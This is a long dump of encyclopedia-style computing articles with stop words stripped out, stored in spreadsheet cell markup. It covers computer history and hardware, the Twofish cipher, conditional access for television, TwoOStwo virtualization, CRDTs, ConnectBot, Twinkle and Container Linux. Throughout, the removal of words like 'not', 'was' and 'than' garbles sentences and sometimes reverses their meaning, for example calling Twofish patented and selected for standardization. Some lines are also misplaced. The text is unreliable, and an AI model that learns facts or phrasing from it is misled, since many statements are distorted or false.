thermionic valves (tubes), mark 2,400 valves, five times faster simpler operate mark greatly speeding decoding process. eniac (electronic numerical integrator computer) first electronic programmable computer built u.s. although eniac similar colossus, much faster, flexible, turing-complete. like colossus, "program" eniac defined states patch cables switches, stored program electronic machines came later. once program written, mechanically machine manual resetting plugs switches. programmers eniac women, often known collectively "eniac girls".it combined high speed electronics ability programmed many complex problems. could subtract 5000 times second, thousand times faster machine. also modules multiply, divide, square root. high speed memory limited words (about bytes). built direction john mauchly presper eckert university pennsylvania, eniac's development construction lasted 1943 full operation 1945. machine huge, weighing tons, using kilowatts electric power contained 18,000 vacuum tubes, 1,500 relays, hundreds thousands resistors, capacitors, inductors. modern computers concept modern computer principle modern computer proposed alan turing seminal 1936 paper, computable numbers. turing proposed simple device called "universal computing machine" known universal turing machine. proved machine capable computing anything computable executing instructions (program) stored tape, allowing machine programmable. fundamental concept turing's design stored program, instructions computing stored memory. neumann acknowledged central concept modern computer paper. turing machines central object study theory computation. except limitations imposed finite memory stores, modern computers said turing-complete, say, algorithm execution capability equivalent universal turing machine. stored programs early computing machines fixed programs. changing function required re-wiring re-structuring machine. with proposal stored-program computer changed. stored-program computer includes design instruction store memory instructions program) details computation. theoretical basis stored-program computer laid alan turing 1936 paper. 1945, turing joined national physical laboratory began work developing electronic stored-program digital computer. 1945 report "proposed electronic calculator" first specification device. john neumann university pennsylvania also circulated first draft report edvac 1945.the manchester baby world's first stored-program computer. built university manchester england frederic williams, kilburn geoff tootill, first program june 1948. designed testbed williams tube, first random-access digital storage device. although computer considered "small primitive" standards time, first working machine contain elements essential modern electronic computer. soon baby demonstrated feasibility design, project initiated university develop usable computer, manchester mark grace hopper first person develop compiler programming language.the mark turn quickly became prototype ferranti mark world's first commercially available general-purpose computer. built ferranti, delivered university manchester february 1951. least seven later machines delivered 1953 1957, shell labs amsterdam. october 1947, directors british catering company lyons company decided take active role promoting commercial development computers. computer became operational april 1951 world's first regular routine office computer job. transistors concept field-effect transistor proposed julius edgar lilienfeld 1925. john bardeen walter brattain, working william shockley bell labs, built first working transistor, point-contact transistor, 1947, followed shockley's bipolar junction transistor 1948. from 1955 onwards, transistors replaced vacuum tubes computer designs, giving rise "second generation" computers. compared vacuum tubes, transistors many advantages: smaller, require less power vacuum tubes, give less heat. junction transistors much reliable vacuum tubes longer, indefinite, service life. transistorized computers could contain tens thousands binary logic circuits relatively compact space. however, early junction transistors relatively bulky devices difficult manufacture mass-production basis, limited number specialised applications.at university manchester, team leadership kilburn designed built machine using newly developed transistors instead valves. their first transistorised computer first world, operational 1953, second version completed april 1955. however, machine make valves generate clock waveforms circuitry read write magnetic drum memory, first completely transistorized computer. that distinction goes harwell cadet 1955, built electronics division atomic energy research establishment harwell. metal–oxide–silicon field-effect transistor (mosfet), also known transistor, invented mohamed atalla dawon kahng bell labs 1959. first truly compact transistor could miniaturised mass-produced wide range uses. with high scalability, much lower power consumption higher density bipolar junction transistors, mosfet made possible build high-density integrated circuits. addition data processing, also enabled practical transistors memory cell storage elements, leading development semiconductor memory, replaced earlier magnetic-core memory computers. mosfet microcomputer revolution, became driving force behind computer revolution. mosfet widely used transistor computers, fundamental building block digital electronics. integrated circuits next great advance computing power came advent integrated circuit (ic). idea integrated circuit first conceived radar scientist working royal radar establishment ministry defence, geoffrey w.a. dummer. dummer presented first public description integrated circuit symposium progress quality electronic components washington, d.c. 1952.the first working invented jack kilby texas instruments robert noyce fairchild semiconductor. kilby recorded initial ideas concerning integrated circuit july 1958, successfully demonstrating first working integrated example september 1958. patent application february 1959, kilby described device body semiconductor material wherein components electronic circuit completely integrated". however, kilby's invention hybrid integrated circuit (hybrid ic), rather monolithic integrated circuit (ic) chip. kilby's external wire connections, made difficult mass-produce.noyce also came idea integrated circuit half year later kilby. noyce's invention first true monolithic chip. chip solved many practical problems kilby's not. produced fairchild semiconductor, made silicon, whereas kilby's chip made germanium. noyce's monolithic fabricated using planar process, developed colleague jean hoerni early 1959. turn, planar process based mohamed atalla's work semiconductor surface passivation silicon dioxide late 1950s.modern monolithic predominantly (metal-oxide-semiconductor) integrated circuits, built mosfets (mos transistors). earliest experimental fabricated 16-transistor chip built fred heiman steven hofstein 1962. general microelectronics later introduced first commercial 1964, developed robert norman. following development self-aligned gate (silicon-gate) transistor robert kerwin, donald klein john sarace bell labs 1967, first silicon-gate self-aligned gates developed federico faggin fairchild semiconductor 1968. mosfet since become critical device component modern ics.the development integrated circuit invention microprocessor, heralded explosion commercial personal computers. while subject exactly device first microprocessor contentious, partly lack agreement exact definition term "microprocessor", largely undisputed first single-chip microprocessor intel 4004, designed realized federico faggin silicon-gate technology, along hoff, masatoshi shima stanley mazor intel. early 1970s, technology enabled integration 10,000 transistors single chip.system chip (socs) complete computers microchip chip) size coin. they integrated flash memory. integrated, usually placed directly (known package package) opposite side circuit board) soc, flash memory usually placed right next soc, done improve data transfer speeds, data signals travel long distances. since eniac 1945, computers advanced enormously, modern socs (such snapdragon 865) size coin also hundreds thousands times powerful eniac, integrating billions transistors, consuming watts power. mobile computers first mobile computers heavy mains power. 5100 early example. later portables osborne compaq portable considerably lighter still needed plugged first laptops, grid compass, removed requirement incorporating batteries continued miniaturization computing resources advancements portable battery life, portable computers grew popularity 2000s. developments allowed manufacturers integrate computing resources cellular mobile phones early 2000s. these smartphones tablets variety operating systems recently became dominant computing device market. these powered system chip (socs), complete computers microchip size coin. types computers classified number different ways, including: architecture analog computer digital computer hybrid computer harvard architecture neumann architecture complex instruction computer reduced instruction computer size, form-factor purpose supercomputer mainframe computer minicomputer (term longer used) server rackmount server blade server tower server personal computer workstation microcomputer (term longer used) home computer desktop computer tower desktop slimline desktop multimedia computer (non-linear editing system computers, video editing like) gaming computer all-in-one nettop (small form factor pcs, mini pcs) home theater keyboard computer portable computer thin client internet appliance laptop desktop replacement computer gaming laptop rugged laptop 2-in-1 ultrabook chromebook subnotebook netbook mobile computers: tablet computer smartphone ultra-mobile pocket palmtop handheld wearable computer smartwatch smartglasses single-board computer plug computer stick programmable logic controller computer-on-module system module system package system-on-chip (also known application processor lacks circuitry radio circuitry) microcontroller hardware term hardware covers parts computer tangible physical objects. circuits, computer chips, graphic cards, sound cards, memory (ram), motherboard, displays, power supplies, cables, keyboards, printers "mice" input devices hardware. history computing hardware other hardware topics general-purpose computer four main components: arithmetic logic unit (alu), control unit, memory, input output devices (collectively termed i/o). these parts interconnected buses, often made groups wires. inside parts thousands trillions small electrical circuits turned means electronic switch. each circuit represents (binary digit) information circuit represents "1", represents positive logic representation). circuits arranged logic gates circuits control state circuits. input devices when unprocessed data sent computer help input devices, data processed sent output devices. input devices hand-operated automated. processing mainly regulated cpu. some examples input devices are: computer keyboard digital camera digital video graphics tablet image scanner joystick microphone mouse overlay keyboard real-time clock trackball touchscreen light output devices means computer gives output known output devices. some examples output devices are: computer monitor printer speaker projector sound card video card control unit control unit (often called control system central controller) manages computer's various components; reads interprets (decodes) program instructions, transforming control signals activate parts computer. control systems advanced computers change order execution instructions improve performance. component common cpus program counter, special memory cell register) keeps track location memory next instruction read from.the control system's function follows— simplified description, steps performed concurrently different order depending type cpu: read code next instruction cell indicated program counter. decode numerical code instruction commands signals systems. increment program counter points next instruction. read whatever data instruction requires cells memory perhaps input device). location required data typically stored within instruction code. provide necessary data register. instruction requires specialized hardware complete, instruct hardware perform requested operation. write result back memory location register perhaps output device. jump back step (1).since program counter (conceptually) another memory cells, changed calculations done alu. adding program counter would cause next instruction read place locations program. instructions modify program counter often known "jumps" allow loops (instructions repeated computer) often conditional instruction execution (both examples control flow). sequence operations control unit goes process instruction like short computer program, indeed, complex designs, another smaller computer called microsequencer, runs microcode program causes events happen. central processing unit (cpu) control unit, alu, registers collectively known central processing unit (cpu). early cpus composed many separate components. since 1970s, cpus typically constructed single integrated circuit chip called microprocessor. arithmetic logic unit (alu) capable performing classes operations: arithmetic logic. arithmetic operations particular supports limited addition subtraction, might include multiplication, division, trigonometry functions sine, cosine, etc., square roots. some operate whole numbers (integers) others floating point represent real numbers, albeit limited precision. however, computer capable performing simplest operations programmed break complex operations simple steps perform. therefore, computer programmed perform arithmetic operation—although take time directly support operation. also compare numbers return boolean truth values (true false) depending whether equal greater less ("is greater 65?"). logic operations involve boolean logic: and, xor, not. these useful creating complicated conditional statements processing boolean logic. superscalar computers contain multiple alus, allowing process several instructions simultaneously. graphics processors computers simd mimd features often contain alus perform arithmetic vectors matrices. memory computer's memory viewed list cells numbers placed read. each cell numbered "address" store single number. computer instructed "put number cell numbered 1357" "add number cell 1357 number cell 2468 answer cell 1595." information stored memory represent practically anything. letters, numbers, even computer instructions placed memory equal ease. since differentiate different types information, software's responsibility give significance memory sees nothing series numbers. almost modern computers, memory cell store binary numbers groups eight bits (called byte). each byte able represent different numbers 256); either −128 +127. store larger numbers, several consecutive bytes used (typically, two, four eight). when negative numbers required, usually stored two's complement notation. other arrangements possible, usually seen outside specialized applications historical contexts. computer store kind information memory represented numerically. modern computers billions even trillions bytes memory. contains special memory cells called registers read written much rapidly main memory area. there typically hundred registers depending type cpu. registers used frequently needed data items avoid access main memory every time data needed. data constantly worked reducing need access main memory (which often slow compared control units) greatly increases computer's speed. computer main memory comes principal varieties: random-access memory read-only memory romram read written anytime commands preloaded data software never changes, therefore read typically used store computer's initial start-up instructions. general, contents erased power computer turned off, retains data indefinitely. contains specialized program called bios orchestrates loading computer's operating system hard disk drive whenever computer turned reset. embedded computers, frequently disk drives, required software stored rom. software stored often called firmware, notionally like hardware software. flash memory blurs distinction ram, retains data turned also rewritable. typically much slower conventional however, restricted applications high speed unnecessary.in sophisticated computers cache memories, slower registers faster main memory. generally computers sort cache designed move frequently needed data cache automatically, often without need intervention programmer's part. input/output (i/o) means computer exchanges information outside world. devices provide input output computer called peripherals. typical personal computer, peripherals include input devices like keyboard mouse, output devices display printer. hard disk drives, floppy disk drives optical disc drives serve input output devices. computer networking another form i/o. devices often complex computers right, memory. graphics processing unit might contain fifty tiny computers perform calculations necessary display graphics. modern desktop computers contain many smaller computers assist main performing i/o. 2016-era flat screen display contains computer circuitry. multitasking while computer viewed running gigantic program stored main memory, systems necessary give appearance running several programs simultaneously. this achieved multitasking i.e. computer switch rapidly running program turn. means done special signal called interrupt, periodically cause computer stop executing instructions something else instead. remembering executing prior interrupt, computer return task later. several programs running time". interrupt generator might causing several hundred interrupts second, causing program switch time. since modern computers typically execute instructions several orders magnitude faster human perception, appear many programs running time even though ever executing given instant. this method multitasking sometimes termed "time-sharing" since program allocated "slice" time turn.before inexpensive computers, principal multitasking allow many people share computer. seemingly, multitasking would cause computer switching several programs slowly, direct proportion number programs running, programs spend much time waiting slow input/output devices complete tasks. program waiting user click mouse press keyboard, take "time slice" event waiting occurred. this frees time programs execute many programs simultaneously without unacceptable speed loss. multiprocessing some computers designed distribute work across several cpus multiprocessing configuration, technique employed large powerful machines supercomputers, mainframe computers servers. multiprocessor multi-core (multiple cpus single integrated circuit) personal laptop computers widely available, increasingly used lower-end markets result. supercomputers particular often highly unique architectures differ significantly basic stored-program architecture general-purpose computers. they often feature thousands cpus, customized high-speed interconnects, specialized computing hardware. such designs tend useful specialized tasks large scale program organization required successfully utilize available resources once. supercomputers usually usage large-scale simulation, graphics rendering, cryptography applications, well so-called "embarrassingly parallel" tasks. software software refers parts computer material form, programs, data, protocols, etc. software part computer system consists encoded information computer instructions, contrast physical hardware system built. computer software includes computer programs, libraries related non-executable data, online documentation digital media. often divided system software application software computer hardware software require neither realistically used own. when software stored hardware cannot easily modified, bios compatible computer, sometimes called "firmware". languages there thousands different programming languages—some intended general purpose, others useful highly specialized applications. programs defining feature modern computers distinguishes machines programmed. that type instructions (the program) given computer, process them. moder</t>
  </si>
  <si>
    <t>Twofish</t>
  </si>
  <si>
    <t>cryptography, twofish symmetric block cipher block size bits sizes bits. five finalists advanced encryption standard contest, selected standardization. twofish related earlier block cipher blowfish. twofish's distinctive features pre-computed key-dependent s-boxes, relatively complex schedule. half n-bit used actual encryption half n-bit used modify encryption algorithm (key-dependent s-boxes). twofish borrows elements designs; example, pseudo-hadamard transform (pht) safer family ciphers. twofish feistel structure like des. twofish also employs maximum distance separable matrix. when introduced 1998, twofish slightly slower rijndael (the chosen algorithm advanced encryption standard) 128-bit keys, somewhat faster 256-bit keys. since 2008, virtually intel processors included hardware acceleration rijndael algorithm instruction set; rijndael implementations instruction orders magnitude faster (software) twofish implementations.twofish designed bruce schneier, john kelsey, doug whiting, david wagner, chris hall, niels ferguson: "extended twofish team" perform cryptanalysis twofish. other contest entrants included stefan lucks, tadayoshi kohno, mike stay. twofish cipher patented, reference implementation placed public domain. result, twofish algorithm free anyone without restrictions whatsoever. ciphers included openpgp standard (rfc 4880). however, twofish seen less widespread usage blowfish, available longer. performance while designed performance always important factor twofish. twofish designed allow several layers performance trade offs, depending importance encryption speed, memory usage, hardware gate count, setup parameters. this allows highly flexible algorithm, implemented variety applications. there multiple space–time tradeoffs made, software well hardware twofish. example tradeoff would precomputation round subkeys s-boxes, lead speed increases factor more. these come, however, cost needed store them. estimates table based existing 0.35 cmos technology. cryptanalysis 1999, niels ferguson published impossible differential attack breaks rounds 256-bit version using 2256 steps.as 2000, best published cryptanalysis twofish block cipher truncated differential cryptanalysis full 16-round version. paper claims probability truncated differentials 2−57.3 block take roughly chosen plaintexts petabytes worth data) find good pair truncated differentials.bruce schneier responded 2005 blog entry paper present full cryptanalytic attack, hypothesized differential characteristics: "but even theoretical perspective, twofish even remotely broken. there extensions results since published 2000." also threefish advanced encryption standard data encryption standard references articles bruce schneier; john kelsey; doug whiting; david wagner; chris hall; niels ferguson (1998-06-15). "the twofish encryption algorithm" (pdf/postscript). retrieved 2013-01-14. {{cite journal}}: cite journal requires |journal= (help) bruce schneier; john kelsey; doug whiting; david wagner; chris hall; niels ferguson (1999-03-22). twofish encryption algorithm: 128-bit block cipher. york city: john wiley sons. isbn 0-471-35381-7. external links twofish page, full specifications, free source code, twofish resources bruce schneier ciphers twofish reference implementation derived code products twofish bruce schneier better algorithm: rijndael twofish? sci.crypt standard cryptographic algorithm naming: twofish</t>
  </si>
  <si>
    <t>Conditional access</t>
  </si>
  <si>
    <t>conditional access (abbreviated conditional access system (abbreviated cas) protection content requiring certain criteria granting access content. term commonly used relation digital television systems software. software conditional access function lets manage people’s access software question, email, applications, documents information. usually offered saas (software-as-a-service) deployed organizations keep company data safe. setting conditions access data, organization control accesses data information accessed. possible conditions could geographical location address network used device browser operating system (os)when setting conditional access, access limited prevented chosen conditions. this determined that, example, access possible certain networks prevented certain browsers. current providers conditional access include: microsoft (including office 365) azure active directory workspace 365conditional access offered microsoft intune. digital video broadcasting under digital video broadcasting (dvb) standard, conditional access system (cas) standards defined specification documents dvb-ca (conditional access), dvb-csa (the common scrambling algorithm) dvb-ci (the common interface). these standards define method obfuscate digital-television stream, access provided valid decryption smart-cards. specifications conditional access available standards page website. this achieved combination scrambling encryption. data stream scrambled 48-bit secret key, called control word. knowing value control word given moment relatively little value, normal conditions, content providers change control word several times minute. control word generated automatically successive values usually predictable; specification recommends using physical process that. order receiver unscramble data stream, must permanently informed current value control word. practice, must informed slightly advance, viewing interruption occurs. encryption used protect control word transmission receiver: control word encrypted entitlement control message (ecm). subsystem receiver decrypt control word authorised authority sent receiver form entitlement management message (emm). emms specific subscriber, identified smart card receiver, groups subscribers, issued much less frequently ecms, usually monthly intervals. this apparently sufficient prevent unauthorized viewing, lowered interval minutes. this different every provider, bskyb uses term weeks. when nagravision hacked, digital+ started sending every three days make unauthorized viewing cumbersome. contents ecms emms standardized depend conditional access system used. control word transmitted different ecms once. this allows several conditional access systems time, feature called simulcrypt, saves bandwidth encourages multiplex operators cooperate. simulcrypt widespread europe; channels, like international europe bird satellites, different systems parallel. decryption cards read, sometimes updated specific access rights, either conditional-access module (cam), card-format card reader meeting dvb-ci standards, built-in iso/iec 7816 card reader, digibox. several companies provide competing systems; abv, videoguard, irdeto, nagravision, conax, viaccess, synamedia, mediaguard (a.k.a. seca) among commonly used systems. common usage systems, many tools even directly circumvent encryption exist. emulators multiple-format cams exist either read several card formats even directly decrypt compromised encryption scheme. most multiple format cams cams directly decrypt signal based reverse engineering systems. large proportion systems currently encryption opened full decryption point, including nagravision, conax, viaccess, mediaguard (v1) well first version videoguard. conditional access north america canadian united states cable systems, standard conditional access provided cablecards whose specification developed cable company consortium cablelabs. cable companies required federal communications commission support cablecards; standards exist communication (m-card) satellite television standards. next generation approaches united states eschew physical cards employ schemes using downloadable software conditional access dcas. main appeal approaches access control upgraded dynamically response security breaches without requiring expensive exchanges physical conditional-access modules. another appeal inexpensively incorporated non-traditional media display devices portable media players. conditional access systems conditional access systems include: analog systems eurocrypt nagravision videocipher videocrypt digital systems also access control, principle applied outside television. b-cas cablecard card sharing compression networks conditional-access module digicipher digital rights management pirate decryption powervu smart card television encryption viaccess videocipher videoguard pairing smartcard references external links history spanish list dvbservices.com</t>
  </si>
  <si>
    <t>TwoOStwo</t>
  </si>
  <si>
    <t>twoostwo commercial software product developed parallels software studio (prior acquisition swsoft). workstation software consisted virtual machine suite intel x86-compatible computers allowed creation execution multiple virtual computers simultaneously. each virtual machine instance could execute guest operating system including windows, linux, os/2 variants. description computer operating system instance executes twoostwo process referred host machine. instances operating systems running inside virtual machine referred guest virtual machines. like emulator, twoostwo provides completely virtualized hardware guest operating system; example, irrespective make model physical network adapter, guest machine novell/eagle ne2000 realtek rtl8029(as) network adapter. twoostwo virtualizes devices within virtual environment, including video adapter, network adapter, hard disk adapters. also provides pass-through drivers serial parallel devices. because guest virtual machines hardware drivers irrespective actual hardware host computer, virtual machine instances highly portable computers. example, running virtual machine stopped, copied another physical computer, started. implementation conventional emulators like bochs emulate microprocessor, executing guest instruction calling software subroutine host machine simulates function instruction. this level abstraction allows guest machine host machines different type microprocessor, also slow. efficient approach consists software debugger technique. some parts code executed natively real processor; 'bad' instructions, software interrupts break execution guest operating system code particular instruction emulated. twoostwo, well vmware workstation, virtual windows qemu kqemu add-on, take even optimized approach code directly possible. this case user mode virtual 8086 mode code x86. drawback guest compatible host cpu. unlike emulator, cannot twoostwo classic os/powerpc software intel processor. another drawback normally possible efficiently nest virtual machines. finally, although twoostwo virtual machines user mode, twoostwo requires installing various device drivers host operating system. features besides bridging network adapters, cd-rom readers hard disk drives, twoostwo also provides ability simulate hardware. example, image mounted cdrom .hdd files mounted hard disks. also parallels workstation svista vmware user mode linux comparison platform virtualization software</t>
  </si>
  <si>
    <t>Two-Track-MAC</t>
  </si>
  <si>
    <t>two-track-mac algorithm selected finalist nessie november 2000 conceived fast reliable method hash data. development attended bart rompay eng. from leuven university katholieke universiteit leuven belgium bert boer debis (germany). uses hash functions parallel, making similar mdc-2. external links (two-track-)mac based trails ripemd</t>
  </si>
  <si>
    <t>Conflict-free replicated data type</t>
  </si>
  <si>
    <t>distributed computing, conflict-free replicated data type (crdt) data structure replicated across multiple computers network, following features: application update replica independently, concurrently without coordinating replicas. algorithm (itself part data type) automatically resolves inconsistencies might occur. although replicas different state particular point time, guaranteed eventually converge.the crdt concept formally defined 2011 marc shapiro, nuno preguiça, carlos baquero marek zawirski. development initially motivated collaborative text editing mobile computing. crdts also used online chat systems, online gambling, soundcloud audio distribution platform. nosql distributed databases redis, riak cosmos crdt data types. background concurrent updates multiple replicas data, without coordination computers hosting replicas, result inconsistencies replicas, general case resolvable. restoring consistency data integrity conflicts updates require updates entirely partially dropped. accordingly, much distributed computing focuses problem prevent concurrent updates replicated data. another possible approach optimistic replication, concurrent updates allowed through, inconsistencies possibly created, results merged "resolved" later. approach, consistency replicas eventually re-established "merges" differing replicas. while optimistic replication might work general case, significant practically useful class data structures, crdts, work always possible merge resolve concurrent updates different replicas data structure without conflicts. this makes crdts ideal optimistic replication. example, one-way boolean event flag trivial crdt: bit, value true false. true means particular event occurred least once. false means event occurred. once true, flag cannot back false. event, occurred, cannot un-occur.) resolution method "true wins": merging replica flag true (that replica observed event), another flag false (that replica observed event), resolved result true event observed. types crdts there approaches crdts, provide strong eventual consistency: operation-based crdts state-based crdts.the alternatives theoretically equivalent, emulate other. however, practical differences. state-based crdts often simpler design implement; requirement communication substrate kind gossip protocol. their drawback entire state every crdt must transmitted eventually every replica, costly. contrast, operation-based crdts transmit update operations, typically small. however, operation-based crdts require guarantees communication middleware; operations dropped duplicated transmitted replicas, delivered causal order. operation-based crdts operation-based crdts also called commutative replicated data types, cmrdts. cmrdt replicas propagate state transmitting update operation. example, cmrdt single integer might broadcast operations (+10) (−20). replicas receive updates apply locally. operations commutative. however, necessarily idempotent. communications infrastructure must therefore ensure operations replica delivered replicas, without duplication, order. pure operation-based crdts variant operation-based crdts reduces metadata size. state-based crdts state-based crdts called convergent replicated data types, cvrdts. contrast cmrdts, cvrdts send full local state replicas, states merged function must commutative, associative, idempotent. merge function provides join pair replica states, states forms semilattice. update function must monotonically increase internal state, according partial order rules semilattice. delta state crdts simply delta crdts) optimized state-based crdts recently applied changes state disseminated instead entire state. comparison while cmrdts place requirements protocol transmitting operations replicas, less bandwidth cvrdts number transactions small comparison size internal state. however, since cvrdt merge function associative, merging state replica yields previous updates replica. gossip protocols work well propagating cvrdt state replicas reducing network handling topology changes. some lower bounds storage complexity state-based crdts known. known crdts g-counter (grow-only counter) payload integer[n] initial [0,0,...,0] update increment() myid() p[g] p[g] query value() integer p[i] compare boolean x.p[i] y.p[i]) merge payload z.p[i] max(x.p[i], y.p[i]) this cvrdt implements counter cluster nodes. each node cluster assigned retrieved call myid(). thus node assigned slot array increments locally. updates propagated background, merged taking max() every element compare function included illustrate partial order states. merge function commutative, associative, idempotent. update function monotonically increases internal state according compare function. this thus correctly-defined cvrdt provide strong eventual consistency. cmrdt equivalent broadcasts increment operations received. pn-counter (positive-negative counter) payload integer[n] integer[n] initial [0,0,...,0], [0,0,...,0] update increment() myid() p[g] p[g] update decrement() myid() n[g] n[g] query value() integer p[i] n[i] compare boolean x.p[i] y.p[i] x.n[i] y.n[i]) merge payload z.p[i] max(x.p[i], y.p[i]) z.n[i] max(x.n[i], y.n[i]) common strategy crdt development combine multiple crdts make complex crdt. case, g-counters combined create data type supporting increment decrement operations. g-counter counts increments; g-counter counts decrements. value pn-counter value counter minus value counter. merge handled letting merged counter merge g-counters, similarly counters. note crdt's internal state must increase monotonically, even though external state exposed query return previous values. g-set (grow-only set) payload initial update add(element query lookup(element boolean compare boolean (s.a t.a) merge payload g-set (grow-only set) allows adds. element, added, cannot removed. merger g-sets union. 2p-set (two-phase set) payload initial query lookup(element boolean update add(element update remove(element lookup(e) compare boolean (s.a t.r) merge payload g-sets (grow-only sets) combined create 2p-set. with addition remove (called "tombstone" set), elements added also removed. once removed, element cannot re-added; element tombstone set, query never return true element. 2p-set uses "remove-wins" semantics, remove(e) takes precedence add(e). lww-element-set (last-write-wins-element-set) lww-element-set similar 2p-set consists "add set" "remove set", timestamp element. elements added lww-element-set inserting element set, timestamp. elements removed lww-element-set added remove set, timestamp. element member lww-element-set set, either remove set, remove earlier timestamp latest timestamp set. merging replicas lww-element-set consists taking union sets union remove sets. when timestamps equal, "bias" lww-element-set comes play. lww-element-set biased towards adds removals. advantage lww-element-set 2p-set that, unlike 2p-set, lww-element-set allows element reinserted removed. or-set (observed-remove set) or-set resembles lww-element-set, using unique tags instead timestamps. element set, list add-tags list remove-tags maintained. element inserted or-set unique generated added add-tag list element. elements removed or-set tags element's add-tag list added element's remove-tag (tombstone) list. merge or-sets, element, add-tag list union add-tag lists, likewise remove-tag lists. element member add-tag list less remove-tag list nonempty. optimization eliminates need maintaining tombstone possible; avoids potentially unbounded growth tombstone set. optimization achieved maintaining vector timestamps replica. sequence crdts sequence, list, ordered crdt used build collaborative real-time editor, alternative operational transformation (ot). some known sequence crdts treedoc, rga, woot, logoot, lseq. crate decentralized real-time editor built lseqsplit extension lseq) runnable network browsers using webrtc. logootsplit proposed extension logoot order reduce metadata sequence crdts. mute online web-based peer-to-peer real-time collaborative editor relying logootsplit algorithm. industrial sequence crdts, including open-source ones, known out-perform academic implementations optimizations realistic testing methodology. main popular example crdt, pioneer using plain list instead tree (ala kleppmann's automerge). industry fluid framework open-source collaborative platform built microsoft provides server reference implementations client-side sdks creating modern realtime applications using crdts. nimbus note collaborative note-taking application uses crdt collaborative editing. redis distributed, highly available scalable in-memory database uses crdts implementing globally distributed databases based fully compatible redis open source. soundcloud open-sourced roshi, lww-element-set crdt soundcloud stream implemented redis. riak distributed nosql key-value data store based crdts. league legends uses riak crdt implementation in-game chat system, handles million concurrent users 11,000 messages second. bet365, stores hundreds megabytes data riak implementation or-set. tomtom employs crdts synchronize navigation data devices user. phoenix, framework written elixir, uses crdts support real time multi-node information sharing version 1.2. facebook implements crdts apollo low-latency "consistency scale" database. teletype atom employs crdts enable developers share workspace team members collaborate code real time. haja networks' orbitdb uses operation-based crdts core data structure, ipfs-log. apple implements crdts notes syncing offline edits multiple devices. swim platform running distributed real-time streaming applications deliver continuous intelligence. uses streaming actors stream pure op-based crdt state updates actors implements streaming data pipeline. references external links collection resources papers crdts "strong eventual consistency conflict-free replicated data types" talk crdts) marc shapiro readings conflict-free replicated data types christopher meiklejohn theorem crdts: years later. rules changed eric brewer</t>
  </si>
  <si>
    <t>ConnectBot</t>
  </si>
  <si>
    <t>connectbot open-source secure shell client android operating system. lets users securely remotely servers secure shell daemon. this allows user enter commands android device commands remote server instead local android device. uses standard encryption used ssh2 keep commands data transmitted eavesdropped potential listeners across network. features supports login username password arbitrary server local network internet supports connections based public/private keypair instead username/password increased security allows frequently accessed hosts saved menu, quickly re-connected toonce connection made remote server, program presents user terminal input output sent/received user sitting front terminal actual server. reception connectbot popular secure shell client available android operating system, 1,000,000 downloads 43,000 ratings google play average rating 4.5/5. products based connectbot georgia softworks (gsw) connectbot google play. adds commercial mass deployment features including network licensing, configuration windows server, version updates lan, strong security algorithms using sha-1. connectbot google play. adds file transfers, screenshots, export private keys, hold menus, forwarding. also comparison clients secure shell external links official website connectbot google play connectbot android package f-droid repository source code repository github legacy development site google code software reviews tutorials appbrain video tutorial arbi tutorial android police tutorial inwtx tutorial references</t>
  </si>
  <si>
    <t>Twinkle (software)</t>
  </si>
  <si>
    <t>twinkle free open-source voice communications voice (voip) protocol. designed linux operating systems uses toolkit graphical user interface. call signaling employs session initiation protocol (sip). also features direct ip-to-ip calls. media streams transmitted real-time transport protocol (rtp) encrypted secure real-time transport protocol (srtp) zrtp security protocols. since version 1.3.2 (september 2008), twinkle supports message exchange buddy-list feature presence notification, showing online-status predefined communications partners (provider-support needed). supported audio formats g.711 a-law: kbit/s payload, sampling rate g.711 μ-law: kbit/s payload, sampling rate g.726: kbit/s payload, sampling rate gsm: kbit/s payload, sampling rate g.729: kbit/s payload, sampling rate ilbc: 13.3 15.2 kbit/s payload, sampling rate speex narrow band: 15.2 kbit/s payload, sampling rate speex wide band: kbit/s payload, sampling rate speex ultra wide band: kbit/s payload, sampling rate also comparison voip software list software list free open-source software packages opportunistic encryption references</t>
  </si>
  <si>
    <t>Container Linux</t>
  </si>
  <si>
    <t>container linux (formerly coreos linux) discontinued open-source lightweight operating system based linux kernel designed providing infrastructure clustered deployments, focusing automation, ease application deployment, security, reliability scalability. operating system, container linux provided minimal functionality required deploying applications inside software containers, together built-in mechanisms service discovery configuration sharing.container linux shares foundations gentoo linux, chrome chromium common software development (sdk). container linux adds functionality customization shared foundation support server hardware cases.: 7:02 coreos developed primarily alex polvi, brandon philips michael marineau, major features available stable release.the coreos team announced end-of-life container linux 2020, offering fedora coreos, rhel coreos replacement, based hat. overview container linux provides package manager distributing payload applications, requiring instead applications inside containers. serving single control host, container linux instance uses underlying operating-system-level virtualization features linux kernel create configure multiple containers perform isolated linux systems. that way, resource partitioning containers performed multiple isolated userspace instances, instead using hypervisor providing full-fledged virtual machines. this approach relies linux kernel's cgroups namespaces functionalities, together provide abilities limit, account isolate resource usage (cpu, memory, disk i/o, etc.) collections userspace processes.initially, container linux exclusively used docker component providing additional layer abstraction interface operating-system-level virtualization features linux kernel, well providing standardized format containers allows applications different environments. december 2014, coreos released started support (initially released rocket) alternative docker, providing another standardized format application-container images, related definition container runtime environment, protocol discovering retrieving container images. coreos provides implementation so-called container (appc) specification describes required properties application container image (aci); coreos initiated appc independent committee-steered specifications, aiming become part vendor- operating-system-independent open container initiative (oci; initially named open container project ocp) containerization standard, announced june 2015.container linux uses ebuild scripts gentoo linux automated compilation system components, uses systemd primary init system tight integration systemd various container linux's internal mechanisms. updates distribution container linux achieves additional security reliability operating system updates employing fastpatch dual-partition scheme read-only part installation, meaning updates performed whole installed onto passive secondary boot partition becomes active upon reboot kexec. this approach avoids possible issues arising updating certain parts operating system, ensures easy rollbacks known-to-be-stable version operating system, allows boot partition signed additional security. root partition root file system automatically resized fill available disk-space upon reboots; root partition provides read-write storage space, operating system mounted read-only /usr.to ensure certain part cluster reboots operating system updates applied, preserving resources required running deployed applications, coreos provides locksmith reboot manager container linux. using locksmith, select different update strategies determined reboots performed last step applying updates; example, configure many cluster members allowed reboot simultaneously. internally, locksmith operates locksmithd daemon runs cluster members, locksmithctl command-line utility manages configuration parameters. locksmith written language distributed terms apache license 2.0.the updates distribution system employed container linux based google's open-source omaha project, provides mechanism rolling updates underlying request–response protocol based xml. additionally, coreos provides coreupdate web-based dashboard management cluster-wide updates. operations available coreupdate include assigning cluster members different groups share customized update policies, reviewing cluster-wide breakdowns container linux versions, stopping restarting updates, reviewing recorded update logs. coreupdate also provides http-based allows integration third-party utilities deployment systems. cluster infrastructure container linux provides etcd, daemon runs across computers cluster provides dynamic configuration registry, allowing various configuration data easily reliably shared cluster members. since key–value data stored within etcd automatically distributed replicated automated master election consensus establishment using raft algorithm, changes stored data reflected across entire cluster, achieved redundancy 